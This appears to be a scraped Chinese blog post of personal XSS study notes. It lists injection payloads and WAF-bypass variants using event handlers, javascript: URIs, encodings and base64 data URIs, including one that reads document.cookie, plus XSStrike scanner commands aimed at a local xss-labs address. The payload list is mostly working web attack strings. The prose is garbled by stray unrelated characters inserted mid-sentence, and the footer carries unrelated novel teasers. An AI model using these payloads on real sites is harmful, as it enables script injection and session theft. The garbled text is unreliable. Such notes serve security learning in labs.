xss筆記

1. xsspayload

# 直接輸出
<script>alert(1)</script>
# 標(biāo)簽內(nèi)輸出: 考慮閉合
123"><script>alert(1)</script>
# 事件觸發(fā)
 ' onclick='alert(1)
# 偽協(xié)議JavaScript: 觸發(fā)
"> <a href=javascript:alert('xss') > xss</a> 
# Unicode編碼
javascript:alert('1') ==> &#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;
# %0a繞過空格限制
<img%0Asrc=1%0Aonerror=alert(1)>

2. waf繞過

可以彈窗的:alert踊东,prompt 蔫劣,confirm懈糯,base64加密江耀,編碼繞過(安全狗都沒有過濾)

繞過方法有很多比如:

大小寫繞過
javascript偽協(xié)議
沒有分號
Flash
HTML5 新標(biāo)簽
Fuzz進行測試
雙層標(biāo)簽繞過
特殊標(biāo)簽
<audio src=x onerror=alert(47)>
<audio src=x onerror=prompt(1);>
<audio src=1 href=1 onerror="javascript:alert(1)"></audio>

<video src=x onerror=prompt(1);>
<video src=x onerror=alert(48)>

<div style="width:expression(alert(/1/))">1</div>     ie瀏覽器執(zhí)行
<div onmouseover%3d'alert%26lpar%3b1%26rpar%3b'>DIV<%2fdiv>   url編碼繞過

<math><a/xlink:href=javascript:prompt(1)>Xss
<math href="javascript:javascript:alert(1)">Xss</math>

<button onfocus=alert(1) autofocus>
<button/onclick=alert(1) >xss</button>

<keygen/onfocus=prompt(1);>
<keygen onfocus=javascript:alert(1) autofocus>

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
base64加密:PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg    
      解碼:<script>alert(1)</script>

<IFRAME width%3d"420" height%3d"315" frameborder%3d"0" onload%3d"alert(document.cookie)"><%2fIFRAME>
<iframe%2fsrc%3d"data%3atext%2fhtml%3b%26Tab%3bbase64%26Tab%3b,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg%3d%3d">
<iframe srcdoc%3d'%26lt%3bbody onload%3dprompt%26lpar%3b1%26rpar%3b%26gt%3b'>

3. XSStrike腳本使用

1.測試一個使用GET方法的網(wǎng)頁:
python xsstrike.py -u "http://192.168.195.128/xss-labs/level1.php?name=test"
2.測試POST數(shù)據(jù):
python xsstrike.py -u "http://192.168.195.128/xss-labs/level1.php?name=test" -- 
data "q=query" 
python xsstrike.py -u "http://192.168.195.128/xss-labs/level1.php?name=test" -- 
data '{"q":"query"} --json'
3.測試URL路徑:
python xsstrike.py -u "http://192.168.195.128/xss-labs/level1.php?name=test" -- path
4.從目標(biāo)網(wǎng)頁開始搜尋目標(biāo)并進行測試
python xsstrike.py -u "http://192.168.195.128/xss-labs/level1.php?name=test" -- crawl 
//-l 參數(shù)可以指定爬取深度,默認(rèn)為2
5.只測試文件中指定的URL
python xsstrike.py --seeds urls.txt
6.盲XSS:爬行中使用此參數(shù)可向每個html表單里面的每個變量插入xss代碼
python xsstrike.py -u "http://192.168.195.128/xss-labs/level1.php?name=test" -- crawl --blind
8.模糊測試--fuzzer該模糊器旨在測試過濾器和Web應(yīng)用程序防火墻,可使用 -d 選項將延遲設(shè)置為1秒。
python xsstrike.py -u "http://192.168.195.128/xss-labs/level1.php?name=test" -- fuzzer
9.跳過DOM掃描在爬網(wǎng)時可跳過DOM XSS掃描袱巨,以節(jié)省時間
python xsstrike.py -u "http://192.168.195.128/xss-labs/level1.php?name=test" -- skip-dom

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末阁谆,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子愉老,更是在濱河造成了極大的恐慌场绿,老刑警劉巖,帶你破解...
    沈念sama閱讀 221,695評論 6 515
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件嫉入,死亡現(xiàn)場離奇詭異焰盗,居然都是意外死亡,警方通過查閱死者的電腦和手機咒林,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 94,569評論 3 399
  • 文/潘曉璐 我一進店門熬拒,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人垫竞,你說我怎么就攤上這事澎粟。” “怎么了欢瞪?”我有些...
    開封第一講書人閱讀 168,130評論 0 360
  • 文/不壞的土叔 我叫張陵活烙,是天一觀的道長。 經(jīng)常有香客問我遣鼓,道長啸盏,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 59,648評論 1 297
  • 正文 為了忘掉前任骑祟,我火速辦了婚禮回懦,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘次企。我一直安慰自己怯晕,他們只是感情好,可當(dāng)我...
    茶點故事閱讀 68,655評論 6 397
  • 文/花漫 我一把揭開白布抒巢。 她就那樣靜靜地躺著贫贝,像睡著了一般秉犹。 火紅的嫁衣襯著肌膚如雪蛉谜。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 52,268評論 1 309
  • 那天崇堵,我揣著相機與錄音型诚,去河邊找鬼。 笑死鸳劳,一個胖子當(dāng)著我的面吹牛狰贯,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播,決...
    沈念sama閱讀 40,835評論 3 421
  • 文/蒼蘭香墨 我猛地睜開眼往踢,長吁一口氣:“原來是場噩夢啊……” “哼耸别!你這毒婦竟也來了悯嗓?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,740評論 0 276
  • 序言:老撾萬榮一對情侶失蹤颤练,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后驱负,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體嗦玖,經(jīng)...
    沈念sama閱讀 46,286評論 1 318
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 38,375評論 3 340
  • 正文 我和宋清朗相戀三年跃脊,在試婚紗的時候發(fā)現(xiàn)自己被綠了宇挫。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 40,505評論 1 352
  • 序言:一個原本活蹦亂跳的男人離奇死亡酪术,死狀恐怖器瘪,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情绘雁,我是刑警寧澤娱局,帶...
    沈念sama閱讀 36,185評論 5 350
  • 正文 年R本政府宣布,位于F島的核電站咧七,受9級特大地震影響衰齐,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜继阻,卻給世界環(huán)境...
    茶點故事閱讀 41,873評論 3 333
  • 文/蒙蒙 一耻涛、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧瘟檩,春花似錦抹缕、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,357評論 0 24
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至睹簇,卻和暖如春奏赘,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背太惠。 一陣腳步聲響...
    開封第一講書人閱讀 33,466評論 1 272
  • 我被黑心中介騙來泰國打工磨淌, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人凿渊。 一個月前我還...
    沈念sama閱讀 48,921評論 3 376
  • 正文 我出身青樓梁只,卻偏偏與公主長得像缚柳,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子搪锣,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 45,515評論 2 359

推薦閱讀更多精彩內(nèi)容

  • xssXSS攻擊全稱跨站腳本攻擊秋忙,是為不和層疊樣式表(Cascading Style Sheets, CSS)的縮...
    _return_閱讀 574評論 0 0
  • 近來在學(xué)習(xí)XSS,感覺有一些感悟构舟,卻又好像缺少一點什么翰绊。寫這篇博客,既是一種總結(jié)旁壮,也希望能夠通過這種寫博客的方式整...
    miao_int閱讀 209評論 0 0
  • 跨站腳本(Cross-Site Scripting监嗜,XSS)是一種網(wǎng)站應(yīng)用程序的安全漏洞攻擊,是代碼注入的一種抡谐,允...
    余生似夢閱讀 736評論 0 1
  • 命令執(zhí)行的坑其實早就想填了裁奇。最早是因為校賽時,easyphp一題自己因為不熟悉命令執(zhí)行的一些特性導(dǎo)致套娃題繞到最后...
    byc_404閱讀 4,657評論 0 4
  • 一麦撵、XSS 簡介 XSS(Cross-Site Script刽肠,跨站腳本攻擊) 攻擊方式如下圖所示: XSS 攻擊根...
    One_Hund閱讀 2,020評論 0 1